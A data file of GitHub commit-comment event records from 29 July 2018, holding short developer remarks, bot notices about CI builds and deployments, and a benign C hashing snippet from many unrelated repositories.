{"id":"8034734626","type":"CommitCommentEvent","actor":{"login":"traversaro"},"repo":{"name":"robotology/idyntree"},"payload":{"comment":{"id":29877430,"position":null,"line":null,"path":null,"commit_id":"2c5794244a1f92f4059c88dca5402c98cdeb2662","created_at":"2018-07-29T22:15:33Z","updated_at":"2018-07-29T22:15:33Z","author_association":"MEMBER","body":"Just include the relative header, it is not worth getting crazy for this forward declaration in a deprecated file! "}},"created_at":"2018-07-29T22:15:33Z"}
{"id":"8034734918","type":"CommitCommentEvent","actor":{"login":"repository"},"repo":{"name":"upastushyna/Mention"},"payload":{"comment":{"id":29877432,"position":null,"line":null,"path":null,"commit_id":"ebb6dfecd14b7a4a22cd2966b306e53c36c5bc58","created_at":"2018-07-29T22:15:47Z","updated_at":"2018-07-29T22:15:47Z","author_association":"NONE","body":"I love getting mentioned."}},"created_at":"2018-07-29T22:15:47Z"}
{"id":"8034736533","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29877433,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-29T22:16:59Z","updated_at":"2018-07-29T22:16:59Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-29T22:16:59Z"}
{"id":"8034736569","type":"CommitCommentEvent","actor":{"login":"Stunkymonkey"},"repo":{"name":"syncthing/syncthing-gtk"},"payload":{"comment":{"id":29877434,"position":2,"line":2,"path":"syncthing_gtk/app.py","commit_id":"1afa010dd98d799cb0270a6ecc1d7e6d4241125e","created_at":"2018-07-29T22:17:01Z","updated_at":"2018-07-29T22:17:01Z","author_association":"NONE","body":"remove"}},"created_at":"2018-07-29T22:17:01Z"}
{"id":"8034737070","type":"CommitCommentEvent","actor":{"login":"papajeremy"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29877435,"position":null,"line":null,"path":null,"commit_id":"9772f554c92b09205acbb76ce3e1648e904b1ff4","created_at":"2018-07-29T22:17:24Z","updated_at":"2018-07-29T22:17:24Z","author_association":"NONE","body":"@catfood49 Mosh created this with Bootstrap 3, but if you are using vs 2017, it uses the new Bootstrap 4 which introduced breaking changes.  You can roll your version of Bootstrap back to 3 and it should work.  \r\n\r\nI too have this issue, but I'm ignoring it for now since it's just a tutorial."}},"created_at":"2018-07-29T22:17:24Z"}
{"id":"8034738511","type":"CommitCommentEvent","actor":{"login":"rbarrois"},"repo":{"name":"django-ldapdb/django-ldapdb"},"payload":{"comment":{"id":29877445,"position":null,"line":null,"path":null,"commit_id":"a9630ed713ddb6ea2b31c83ae94d19239c98958c","created_at":"2018-07-29T22:18:26Z","updated_at":"2018-07-29T22:18:26Z","author_association":"CONTRIBUTOR","body":"@Natureshadow small note here: the new settings should be added to the README.rst"}},"created_at":"2018-07-29T22:18:26Z"}
{"id":"8034739715","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/mapclassify-feedstock"},"payload":{"comment":{"id":29877449,"position":null,"line":null,"path":null,"commit_id":"87c6005de6f6822ae4354435ad813731b7c540b0","created_at":"2018-07-29T22:19:26Z","updated_at":"2018-07-29T22:19:26Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @ljwolf was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-29T22:19:26Z"}
{"id":"8034740804","type":"CommitCommentEvent","actor":{"login":"rbarrois"},"repo":{"name":"django-ldapdb/django-ldapdb"},"payload":{"comment":{"id":29877450,"position":null,"line":null,"path":null,"commit_id":"a9630ed713ddb6ea2b31c83ae94d19239c98958c","created_at":"2018-07-29T22:20:20Z","updated_at":"2018-07-29T22:20:20Z","author_association":"CONTRIBUTOR","body":"(NB: I just created #169 to track this; it could be used as a way to bring new contributors in)."}},"created_at":"2018-07-29T22:20:20Z"}
{"id":"8034753019","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"cryptozeny/bitzeny"},"payload":{"comment":{"id":29877504,"position":10,"line":10,"path":"src/crypto/yespower-0.5/yespower.c","commit_id":"ea21675aab1b507de0815ab61202b50aa15c469e","created_at":"2018-07-29T22:30:21Z","updated_at":"2018-07-29T22:30:21Z","author_association":"OWNER","body":"it seems work after this change! :sweat_smile: i will test it more thanks!\r\n\r\n```c\r\nstatic const yespower_params_t yespower_bitzeny = {YESPOWER_0_5, 2048, 8, \"Client Key\", 10};\r\n\r\nint yespower_hash(const char *input, char *output)\r\n{\r\n  return yespower_tls(input, 80, &yespower_bitzeny, (yespower_binary_t *) output);\r\n}\r\n```"}},"created_at":"2018-07-29T22:30:21Z"}
{"id":"8034754071","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29877512,"position":null,"line":null,"path":null,"commit_id":"bbabf23b92335e39295e412ef3f196cb35558422","created_at":"2018-07-29T22:31:11Z","updated_at":"2018-07-29T22:31:11Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 739](https://travis-ci.org/per1234/arduino-ci-script/builds/409634596) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00739-001-tsv"}},"created_at":"2018-07-29T22:31:11Z"}
{"id":"8034754143","type":"CommitCommentEvent","actor":{"login":"Groovounet"},"repo":{"name":"g-truc/glm"},"payload":{"comment":{"id":29877513,"position":null,"line":null,"path":null,"commit_id":"cd58024e40147f871d5a871c8ded90808da99474","created_at":"2018-07-29T22:31:15Z","updated_at":"2018-07-29T22:31:15Z","author_association":"MEMBER","body":"Agreed, that was a bad API design in the first place. :/"}},"created_at":"2018-07-29T22:31:15Z"}
{"id":"8034754170","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29877514,"position":null,"line":null,"path":null,"commit_id":"bbabf23b92335e39295e412ef3f196cb35558422","created_at":"2018-07-29T22:31:16Z","updated_at":"2018-07-29T22:31:16Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 739](https://travis-ci.org/per1234/arduino-ci-script/builds/409634596) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00739"}},"created_at":"2018-07-29T22:31:16Z"}
{"id":"8034758432","type":"CommitCommentEvent","actor":{"login":"rama64"},"repo":{"name":"fedegon/CapacitacionInicialGrupo4"},"payload":{"comment":{"id":29877524,"position":null,"line":null,"path":null,"commit_id":"a889c14e09ed35f93856c76f7413f884753faf6d","created_at":"2018-07-29T22:34:35Z","updated_at":"2018-07-29T22:34:35Z","author_association":"COLLABORATOR","body":"/* soy un comentario \r\nmulti \r\nlinea!  */  :P "}},"created_at":"2018-07-29T22:34:35Z"}
{"id":"8034762849","type":"CommitCommentEvent","actor":{"login":"XTusers"},"repo":{"name":"XTTraining/Web-201"},"payload":{"comment":{"id":29877538,"position":null,"line":null,"path":null,"commit_id":"62085cea77acdfbe5683156e75a908ee05e819b3","created_at":"2018-07-29T22:37:59Z","updated_at":"2018-07-29T22:37:59Z","author_association":"COLLABORATOR","body":"deleting"}},"created_at":"2018-07-29T22:37:59Z"}
{"id":"8034763559","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29877540,"position":null,"line":null,"path":null,"commit_id":"bfa3385aedd4616d5b6beefe9fdfa8f02785bffc","created_at":"2018-07-29T22:38:34Z","updated_at":"2018-07-29T22:38:34Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-29T22:38:34Z"}
{"id":"8034764622","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29877542,"position":null,"line":null,"path":null,"commit_id":"bfa3385aedd4616d5b6beefe9fdfa8f02785bffc","created_at":"2018-07-29T22:39:22Z","updated_at":"2018-07-29T22:39:22Z","author_association":"NONE","body":"Conrats, Stephane, this idea finally worked :)"}},"created_at":"2018-07-29T22:39:22Z"}
{"id":"8034766481","type":"CommitCommentEvent","actor":{"login":"ansleydeakin"},"repo":{"name":"ansleydeakin/acqol-deux"},"payload":{"comment":{"id":29877552,"position":null,"line":null,"path":null,"commit_id":"7a1a949166c55773011938eaff06e319f734068c","created_at":"2018-07-29T22:40:44Z","updated_at":"2018-07-29T22:40:44Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ebb9fcb3-a4f8-46bb-9dc6-2ec5d208f3b1?env_id=ibm%3Ayp%3Aus-south \"acqol-deux\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/1a74dd51-73bc-4fa3-a136-fcfd99e0daa2?env_id=ibm%3Ayp%3Aus-south \"acqol-deux\") deployed [acqol-deux](https://github.com/ansleydeakin/acqol-deux/releases/tag/deploy-ibm-yp-us-south-ansley-deakin.edu.au-dev-20180729-224043 \"deploy-ibm-yp-us-south-ansley-deakin.edu.au-dev-20180729-224043\") to [dev](https://console.bluemix.net/apps/d8c0e304-cee4-4124-a831-708af13fa45c?env_id=ibm:yp:us-south \"ibm:yp:us-south:ansley@deakin.edu.au:dev\"), including this commit"}},"created_at":"2018-07-29T22:40:44Z"}
{"id":"8034767718","type":"CommitCommentEvent","actor":{"login":"QQ10388577"},"repo":{"name":"CJELLYS/JPush-react-native"},"payload":{"comment":{"id":29877557,"position":null,"line":null,"path":null,"commit_id":"ee6fc40c3e556e9425b14fbb3c473bacafc65895","created_at":"2018-07-29T22:41:44Z","updated_at":"2018-07-29T22:41:44Z","author_association":"NONE","body":"你好！请问你那边有React Native ios APP上架的技术或者有认识的朋友可以合作吗？打扰见谅！liuhai8884118 AT gmail.com "}},"created_at":"2018-07-29T22:41:44Z"}
{"id":"8034770449","type":"CommitCommentEvent","actor":{"login":"BlakePurdue"},"repo":{"name":"dgreenwoodSBHS/agileWeb"},"payload":{"comment":{"id":29877563,"position":null,"line":null,"path":null,"commit_id":"0ed1acae87acf4d995ab80a8f071e9a3c73933a5","created_at":"2018-07-29T22:43:57Z","updated_at":"2018-07-29T22:43:57Z","author_association":"NONE","body":"Kia ora "}},"created_at":"2018-07-29T22:43:57Z"}
{"id":"8034771624","type":"CommitCommentEvent","actor":{"login":"Camo32567"},"repo":{"name":"dgreenwoodSBHS/agileWeb"},"payload":{"comment":{"id":29877570,"position":null,"line":null,"path":null,"commit_id":"0ed1acae87acf4d995ab80a8f071e9a3c73933a5","created_at":"2018-07-29T22:44:54Z","updated_at":"2018-07-29T22:44:54Z","author_association":"NONE","body":"Hello"}},"created_at":"2018-07-29T22:44:54Z"}
{"id":"8034772341","type":"CommitCommentEvent","actor":{"login":"MasterDuke17"},"repo":{"name":"perl6/modules.perl6.org"},"payload":{"comment":{"id":29877577,"position":6,"line":26,"path":"lib/ModulesPerl6/DbBuilder/Dist/PostProcessor/p05DataFetcher.pm","commit_id":"866b0af6c9e923d6646c2c1357b61909617de226","created_at":"2018-07-29T22:45:27Z","updated_at":"2018-07-29T22:45:27Z","author_association":"NONE","body":"It looks like the `'README'` was copied, but the second should be `'.travis.yml'`?"}},"created_at":"2018-07-29T22:45:27Z"}
{"id":"8034773457","type":"CommitCommentEvent","actor":{"login":"BoiLover64"},"repo":{"name":"dgreenwoodSBHS/agileWeb"},"payload":{"comment":{"id":29877584,"position":null,"line":null,"path":null,"commit_id":"0ed1acae87acf4d995ab80a8f071e9a3c73933a5","created_at":"2018-07-29T22:46:16Z","updated_at":"2018-07-29T22:46:16Z","author_association":"NONE","body":"cooking\r\nblaskers good lookoingt n\r\n\r\n\r\n"}},"created_at":"2018-07-29T22:46:16Z"}
{"id":"8034774724","type":"CommitCommentEvent","actor":{"login":"BoiLover64"},"repo":{"name":"dgreenwoodSBHS/agileWeb"},"payload":{"comment":{"id":29877585,"position":null,"line":null,"path":null,"commit_id":"0ed1acae87acf4d995ab80a8f071e9a3c73933a5","created_at":"2018-07-29T22:47:15Z","updated_at":"2018-07-29T22:47:15Z","author_association":"NONE","body":"i love bois\r\n"}},"created_at":"2018-07-29T22:47:15Z"}
{"id":"8034774785","type":"CommitCommentEvent","actor":{"login":"dannychot"},"repo":{"name":"Bitcoin-com/Wallet"},"payload":{"comment":{"id":29877586,"position":8,"line":59,"path":"src/js/controllers/tab-send.js","commit_id":"780951eb2fcf8edc3214b59d85ed2ce3aacc3954","created_at":"2018-07-29T22:47:18Z","updated_at":"2018-07-29T22:47:18Z","author_association":"NONE","body":"😀"}},"created_at":"2018-07-29T22:47:18Z"}
{"id":"8034776019","type":"CommitCommentEvent","actor":{"login":"AlexanderDewhirst"},"repo":{"name":"AlexanderDewhirst/BC-projects"},"payload":{"comment":{"id":29877592,"position":null,"line":null,"path":null,"commit_id":"4bb7a2ea8107426869994a4fc346e6a58fd81c08","created_at":"2018-07-29T22:48:23Z","updated_at":"2018-07-29T22:48:23Z","author_association":"OWNER","body":"https://join.slack.com/t/bc-projects/shared_invite/enQtNDA4MDM5MTg4MDIzLTUyODVhYzM3NmNiNjUwMmJjOTAyNmZjZmUyNmRlYWQ1YjI4NDM2ZjIxOTJmZGM1OTJhODkxNTVkZjU4ZjJlNjc"}},"created_at":"2018-07-29T22:48:23Z"}
{"id":"8034778576","type":"CommitCommentEvent","actor":{"login":"BHMOO028"},"repo":{"name":"BHMOO028/LION-MOORE---FLYN-MOTION"},"payload":{"comment":{"id":29877600,"position":null,"line":null,"path":null,"commit_id":"c70cc4ec46cce6a021f52646d43eea083a5107f4","created_at":"2018-07-29T22:50:30Z","updated_at":"2018-07-29T22:50:30Z","author_association":"OWNER","body":"RESTOREFROM28ALTME6"}},"created_at":"2018-07-29T22:50:30Z"}
{"id":"8034780535","type":"CommitCommentEvent","actor":{"login":"BHMOO028"},"repo":{"name":"BHMOO028/LION-MOORE---FLYN-MOTION"},"payload":{"comment":{"id":29877604,"position":null,"line":null,"path":null,"commit_id":"c70cc4ec46cce6a021f52646d43eea083a5107f4","created_at":"2018-07-29T22:52:06Z","updated_at":"2018-07-29T22:52:06Z","author_association":"OWNER","body":"RESTOREFROM28ALTME6LDNUKGBRO8"}},"created_at":"2018-07-29T22:52:06Z"}
{"id":"8034780936","type":"CommitCommentEvent","actor":{"login":"doubleEichDario"},"repo":{"name":"doubleEichDario/Generador-de-Presupuestos"},"payload":{"comment":{"id":29877605,"position":null,"line":null,"path":null,"commit_id":"28659e10207fd25afce96a01323170476da3f18c","created_at":"2018-07-29T22:52:24Z","updated_at":"2018-07-29T22:52:24Z","author_association":"OWNER","body":"El objetivo del proyecto."}},"created_at":"2018-07-29T22:52:24Z"}
{"id":"8034781403","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"perl6/modules.perl6.org"},"payload":{"comment":{"id":29877607,"position":6,"line":26,"path":"lib/ModulesPerl6/DbBuilder/Dist/PostProcessor/p05DataFetcher.pm","commit_id":"866b0af6c9e923d6646c2c1357b61909617de226","created_at":"2018-07-29T22:52:45Z","updated_at":"2018-07-29T22:52:45Z","author_association":"MEMBER","body":"Thanks. Fixed in https://github.com/perl6/modules.perl6.org/commit/4c03426399"}},"created_at":"2018-07-29T22:52:45Z"}
{"id":"8034782956","type":"CommitCommentEvent","actor":{"login":"allan-do"},"repo":{"name":"allan-do/voracious-fir-url-shortener"},"payload":{"comment":{"id":29877613,"position":null,"line":null,"path":null,"commit_id":"651fec2bd8c7ed03cc836b5d9741d1092efc9bf5","created_at":"2018-07-29T22:54:06Z","updated_at":"2018-07-29T22:54:06Z","author_association":"OWNER","body":"pushing from glitch"}},"created_at":"2018-07-29T22:54:06Z"}
{"id":"8034783572","type":"CommitCommentEvent","actor":{"login":"khoi-nguyen"},"repo":{"name":"khoi-nguyen/maths"},"payload":{"comment":{"id":29877614,"position":null,"line":null,"path":null,"commit_id":"400b9610d0102202e27fd6160d680ba21b14773b","created_at":"2018-07-29T22:54:35Z","updated_at":"2018-07-29T22:54:35Z","author_association":"OWNER","body":"@dabertrand  :p bon j'avoue, la fin c'est de ma faute."}},"created_at":"2018-07-29T22:54:35Z"}
{"id":"8034786490","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29877624,"position":null,"line":null,"path":null,"commit_id":"bfa3385aedd4616d5b6beefe9fdfa8f02785bffc","created_at":"2018-07-29T22:57:00Z","updated_at":"2018-07-29T22:57:00Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-29T22:57:00Z"}
{"id":"8034787840","type":"CommitCommentEvent","actor":{"login":"vendethiel"},"repo":{"name":"purr-platform/purr"},"payload":{"comment":{"id":29877631,"position":null,"line":null,"path":null,"commit_id":"4905b0d443e8571bd133a1e7bdb8ef0baf96e978","created_at":"2018-07-29T22:58:06Z","updated_at":"2018-07-29T22:58:06Z","author_association":"NONE","body":"Really happy to see you pickup purr \"back up\", nice job! :D "}},"created_at":"2018-07-29T22:58:06Z"}
{"id":"8034788224","type":"CommitCommentEvent","actor":{"login":"Nevermind5214"},"repo":{"name":"GameMoon/cooldig"},"payload":{"comment":{"id":29877633,"position":null,"line":null,"path":null,"commit_id":"fc50c1351a73840d471651a0d78f7e4c2f10cf8b","created_at":"2018-07-29T22:58:24Z","updated_at":"2018-07-29T22:58:24Z","author_association":"COLLABORATOR","body":"wow gg"}},"created_at":"2018-07-29T22:58:24Z"}
{"id":"8034792545","type":"CommitCommentEvent","actor":{"login":"Alexey71"},"repo":{"name":"AEXmod/platform_packages_apps_Dialer"},"payload":{"comment":{"id":29877655,"position":null,"line":null,"path":null,"commit_id":"8099cb7291753f274e8075c981f52a6cd20b8152","created_at":"2018-07-29T23:01:38Z","updated_at":"2018-07-29T23:01:38Z","author_association":"NONE","body":"If you open via notification, it also does not work\r\nhttps://drive.google.com/file/d/14yoc3hA61_Ezsm4IS3aebtsD8X41bKul/view?usp=sharing"}},"created_at":"2018-07-29T23:01:38Z"}
{"id":"8034796291","type":"CommitCommentEvent","actor":{"login":"maikolweb"},"repo":{"name":"maikolweb/practica-git"},"payload":{"comment":{"id":29877666,"position":null,"line":null,"path":null,"commit_id":"c26958aac714138de1256581f8f9ea2932a981ae","created_at":"2018-07-29T23:04:37Z","updated_at":"2018-07-29T23:04:37Z","author_association":"OWNER","body":"observando el commit viejo xd"}},"created_at":"2018-07-29T23:04:37Z"}
{"id":"8034796321","type":"CommitCommentEvent","actor":{"login":"BigForest"},"repo":{"name":"AshtonFox/VOREStation"},"payload":{"comment":{"id":29877667,"position":null,"line":null,"path":null,"commit_id":"17986e884b5f87927b2fd3152108f8aac67db064","created_at":"2018-07-29T23:04:39Z","updated_at":"2018-07-29T23:04:39Z","author_association":"NONE","body":"Блять дурак зачем ерп система"}},"created_at":"2018-07-29T23:04:39Z"}
{"id":"8034798342","type":"CommitCommentEvent","actor":{"login":"sergeytkachenko"},"repo":{"name":"massimo-ua/api.hfm.acl.pp.ua"},"payload":{"comment":{"id":29877680,"position":null,"line":null,"path":null,"commit_id":"b7ea7ae2c5ff44e3c5ece38e680c655490c80194","created_at":"2018-07-29T23:06:13Z","updated_at":"2018-07-29T23:06:13Z","author_association":"NONE","body":"На vue еще не пишете?) "}},"created_at":"2018-07-29T23:06:13Z"}
{"id":"8034798465","type":"CommitCommentEvent","actor":{"login":"maikolweb"},"repo":{"name":"maikolweb/practica-git"},"payload":{"comment":{"id":29877681,"position":null,"line":null,"path":null,"commit_id":"3e733a9f91ee9e41b7c62af5c71eb9e644993058","created_at":"2018-07-29T23:06:18Z","updated_at":"2018-07-29T23:06:18Z","author_association":"OWNER","body":"hola esto es un commit de la web para el refuerzo"}},"created_at":"2018-07-29T23:06:18Z"}
{"id":"8034799514","type":"CommitCommentEvent","actor":{"login":"jb55"},"repo":{"name":"leezu/dotfiles"},"payload":{"comment":{"id":29877683,"position":null,"line":null,"path":null,"commit_id":"ed3c5743c8b80cbf71eb94d888306fbffe53a26e","created_at":"2018-07-29T23:07:10Z","updated_at":"2018-07-29T23:07:10Z","author_association":"NONE","body":"@leeze Do you think it would be much more work to fix this in spacemacs for https://github.com/syl20bnr/spacemacs/issues/10123 ?"}},"created_at":"2018-07-29T23:07:10Z"}
{"id":"8034808934","type":"CommitCommentEvent","actor":{"login":"S-S-T"},"repo":{"name":"S-S-T/SST_Sally"},"payload":{"comment":{"id":29877714,"position":null,"line":null,"path":null,"commit_id":"36e0dd9a93aeaa23f351d945424b0160898d1984","created_at":"2018-07-29T23:15:08Z","updated_at":"2018-07-29T23:15:08Z","author_association":"OWNER","body":"Added newest changes for multiple players, etc. Plus a TANK file."}},"created_at":"2018-07-29T23:15:08Z"}
{"id":"8034810037","type":"CommitCommentEvent","actor":{"login":"cassioconti"},"repo":{"name":"cassioconti/blockchain-playground"},"payload":{"comment":{"id":29877724,"position":null,"line":null,"path":null,"commit_id":"31d914d0dc61a25cb953329a41549fb378f95716","created_at":"2018-07-29T23:15:48Z","updated_at":"2018-07-29T23:15:48Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [2. validate endpoint](https://trello.com/c/AQJ2Srpg/6-2-validate-endpoint)"}},"created_at":"2018-07-29T23:15:48Z"}
{"id":"8034810848","type":"CommitCommentEvent","actor":{"login":"anahileguizamon"},"repo":{"name":"fedegon/CapacitacionInicialGrupo4"},"payload":{"comment":{"id":29877728,"position":null,"line":null,"path":null,"commit_id":"a889c14e09ed35f93856c76f7413f884753faf6d","created_at":"2018-07-29T23:16:23Z","updated_at":"2018-07-29T23:16:23Z","author_association":"COLLABORATOR","body":"XD estuve estudiando concurrente todo el día teneme piedad jajaja\n\n^Anahi^\n\nEl dom., 29 de jul. de 2018 19:34, Ramiro Ongaro <notifications@github.com>\nescribió:\n\n> /* soy un comentario\n> multi\n> linea! */ :P\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/fedegon/CapacitacionInicialGrupo4/commit/a889c14e09ed35f93856c76f7413f884753faf6d#commitcomment-29877524>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIUH2XxE4DMoPhsrPrXVLzbx5NmvkF4gks5uLjh7gaJpZM4Vll_2>\n> .\n>\n"}},"created_at":"2018-07-29T23:16:23Z"}
{"id":"8034813558","type":"CommitCommentEvent","actor":{"login":"maikolweb"},"repo":{"name":"maikolweb/practica-git"},"payload":{"comment":{"id":29877731,"position":6,"line":30,"path":"core/index.html","commit_id":"3e733a9f91ee9e41b7c62af5c71eb9e644993058","created_at":"2018-07-29T23:18:24Z","updated_at":"2018-07-29T23:18:24Z","author_association":"OWNER","body":"esto es especifo"}},"created_at":"2018-07-29T23:18:24Z"}
{"id":"8034816635","type":"CommitCommentEvent","actor":{"login":"dkv8315"},"repo":{"name":"TechPlasma/SyntaxError-UTSA"},"payload":{"comment":{"id":29877756,"position":null,"line":null,"path":null,"commit_id":"e3e9e7ae6e00d9abcf38f86fb2e72517c7389260","created_at":"2018-07-29T23:20:45Z","updated_at":"2018-07-29T23:20:45Z","author_association":"COLLABORATOR","body":"Form can only be verified if every field besides \"Other\" is filled. This includes \"Contractor/Vendor Information\" and \"Facility Access Information\". Still working on how to make it to where depending upon what checkbox is checked or what the 'Job Status\" is (not Contractor, Vendor or Contract Temporary) that it can still be verified"}},"created_at":"2018-07-29T23:20:45Z"}
{"id":"8034828240","type":"CommitCommentEvent","actor":{"login":"philipbelesky"},"repo":{"name":"TabbycatDebate/tabbycat"},"payload":{"comment":{"id":29877806,"position":7,"line":151,"path":"tabbycat/utils/tables.py","commit_id":"4bedcfc036ecc0e4cbd1ed01e053c23f2774c846","created_at":"2018-07-29T23:29:58Z","updated_at":"2018-07-29T23:29:58Z","author_association":"MEMBER","body":"Yea, the thinking that it looks slightly strange to have a line without any symbols as in multi-person panels that means \"panellist\" which could cause some confusion and mask some cases when a chair had not in fact been allocated. We could potentially use another symbol to indicate 'solo chair' but I couldn't think of anything that was intuitively understandable."}},"created_at":"2018-07-29T23:29:58Z"}
{"id":"8034829481","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29877814,"position":null,"line":null,"path":null,"commit_id":"3b8e19e6ad0e1383de021e27e557763662f11141","created_at":"2018-07-29T23:30:51Z","updated_at":"2018-07-29T23:30:51Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [046 - Desenvolver a Classe Pessoa Service](https://trello.com/c/Y3wEJkey/54-046-desenvolver-a-classe-pessoa-service)"}},"created_at":"2018-07-29T23:30:51Z"}
{"id":"8034830683","type":"CommitCommentEvent","actor":{"login":"NicholasMcCormack"},"repo":{"name":"ellecp/amazon_w207"},"payload":{"comment":{"id":29877817,"position":null,"line":null,"path":null,"commit_id":"25b405c917418544a02a96eb1722fe0f6d94f747","created_at":"2018-07-29T23:31:47Z","updated_at":"2018-07-29T23:31:47Z","author_association":"COLLABORATOR","body":"Uploaded this earlier, but I didn't see it in the repo just now. I've been working off of Elle's structured file, so will upload my revisions to that in a bit. Just didn't want Sai to be trying to access this and not see it either."}},"created_at":"2018-07-29T23:31:47Z"}
{"id":"8034836019","type":"CommitCommentEvent","actor":{"login":"BHMOO028"},"repo":{"name":"BHMOO028/Hello-world"},"payload":{"comment":{"id":29877843,"position":null,"line":null,"path":null,"commit_id":"fcb086f66d3e4e2c96f477d89695d93ee55922e4","created_at":"2018-07-29T23:36:02Z","updated_at":"2018-07-29T23:36:02Z","author_association":"OWNER","body":"?"}},"created_at":"2018-07-29T23:36:02Z"}
{"id":"8034837332","type":"CommitCommentEvent","actor":{"login":"MichaelB7"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29877844,"position":null,"line":null,"path":null,"commit_id":"bfa3385aedd4616d5b6beefe9fdfa8f02785bffc","created_at":"2018-07-29T23:37:05Z","updated_at":"2018-07-29T23:37:05Z","author_association":"NONE","body":"👊👍🎉 very nice!"}},"created_at":"2018-07-29T23:37:05Z"}
{"id":"8034839004","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29877850,"position":null,"line":null,"path":null,"commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T23:38:30Z","updated_at":"2018-07-29T23:38:30Z","author_association":"OWNER","body":"And when will you be available?"}},"created_at":"2018-07-29T23:38:30Z"}
{"id":"8034840865","type":"CommitCommentEvent","actor":{"login":"ledlamp"},"repo":{"name":"ledlamp/mppaudio2discordvoice"},"payload":{"comment":{"id":29877861,"position":null,"line":null,"path":null,"commit_id":"94decf54c137af5d93655194b0e8ebfb844a5d04","created_at":"2018-07-29T23:39:59Z","updated_at":"2018-07-29T23:39:59Z","author_association":"OWNER","body":"used \"slow cpu\" options from default timidity.cfg"}},"created_at":"2018-07-29T23:39:59Z"}
{"id":"8034841766","type":"CommitCommentEvent","actor":{"login":"ledlamp"},"repo":{"name":"ledlamp/mppaudio2discordvoice"},"payload":{"comment":{"id":29877866,"position":null,"line":null,"path":null,"commit_id":"94decf54c137af5d93655194b0e8ebfb844a5d04","created_at":"2018-07-29T23:40:35Z","updated_at":"2018-07-29T23:40:35Z","author_association":"OWNER","body":"sounds... worse"}},"created_at":"2018-07-29T23:40:35Z"}
{"id":"8034845000","type":"CommitCommentEvent","actor":{"login":"ledlamp"},"repo":{"name":"ledlamp/mppaudio2discordvoice"},"payload":{"comment":{"id":29877875,"position":null,"line":null,"path":null,"commit_id":"94decf54c137af5d93655194b0e8ebfb844a5d04","created_at":"2018-07-29T23:43:12Z","updated_at":"2018-07-29T23:43:12Z","author_association":"OWNER","body":"but now it can handle those black midis"}},"created_at":"2018-07-29T23:43:12Z"}
{"id":"8034847674","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/thf-cms"},"payload":{"comment":{"id":29877894,"position":null,"line":null,"path":null,"commit_id":"18c251360f44a97f6a28f7ce630ffc8f274b6f19","created_at":"2018-07-29T23:45:13Z","updated_at":"2018-07-29T23:45:13Z","author_association":"MEMBER","body":"Created multidev environment [thf-cms#ci-14](https://dashboard.pantheon.io/sites/25812cb4-ea8c-436b-ac17-09b0c2b7598b#ci-14).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-14-thf-cms.pantheonsite.io/)"}},"created_at":"2018-07-29T23:45:13Z"}
{"id":"8034851609","type":"CommitCommentEvent","actor":{"login":"BertasCZ"},"repo":{"name":"vector-im/riot-android"},"payload":{"comment":{"id":29877909,"position":16,"line":428,"path":"vector/src/main/res/layout/activity_vector_room.xml","commit_id":"ce126b59833fd2c343f2e0165791db3d57d81067","created_at":"2018-07-29T23:48:19Z","updated_at":"2018-07-29T23:48:19Z","author_association":"NONE","body":"!"}},"created_at":"2018-07-29T23:48:19Z"}
